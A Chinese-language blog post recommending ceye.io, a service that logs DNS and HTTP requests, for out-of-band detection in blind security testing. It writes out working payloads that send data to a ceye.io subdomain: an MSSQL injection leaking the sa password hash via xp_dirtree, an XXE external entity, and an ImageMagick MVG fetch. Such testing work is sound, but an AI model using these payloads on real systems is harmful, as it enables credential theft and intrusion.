可能很多人已經知道了，但還是安利一波ceye.io吧

發現了一個不錯的小工具 —— ceye.io

創宇開放的一個網站，不過在 telnet404 的 passport 處竟然沒有給上鏈接，吐血：

（是不是 logo 還沒做好的原因）

網站要用 telnet 404 帳號登陸，本身功能挺簡單的，只是記錄 DNS 查詢和 http 請求。不過很多人手頭上沒錢買/懶得買VPS（比如我），這個網站提供的功能對於我等窮逼還是十分實用的 qaq 。伺服器大概就是利用泛解析來幫助我們收集記錄，比方說你可以SSRF example.com 時讓它訪問 flag.youruniqueid.ceye.io ，當你受到帶有 flag 的 query 時，你就知道是 example.com 發來的請求了。

給大家兩幅圖片感受一下：

比較經典的利用方式就是用它各種通信外帶了，比如（以下代碼來源於 http://hackinglab.cn ）

SQLi：

DECLARE @host varchar(1024);nSELECT @host=(SELECT TOP 1nmaster.dbo.fn_varbintohexstr(password_hash)nFROM sys.sql_logins WHERE name=sa)n+.ip.port.b182oj.ceye.io;n EXEC(master..xp_dirtreen"+@host+foobar$");n

XXE：

<?xml version="1.0" encoding="UTF-8"?>n<!DOCTYPE root [n<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">n%remote;]>n<root/>n

ImageMagick：

push graphic-contextnviewbox 0 0 640 480nfill url(http://ip.port.b182oj.ceye.io)npop graphic-contextn

當然還有SSRF等等等，總之就是各種通信外帶，在 blind test 的時候特別好用。

但總體還是有待改進，一個是訪問略慢，第二個是希望以後可以讓我們自定義http response，DNS response，這樣就可以跑出 burp collaborator / DNS rebind 的效果了，還剩下一筆 vps 的錢(☆???)。

當然，如果你有獨立的 VPS，當我沒發這篇文章。

（BTW：求廉價穩定且不用綁定信用卡的 VPS 服務商 (′?ω?`)

推薦閱讀：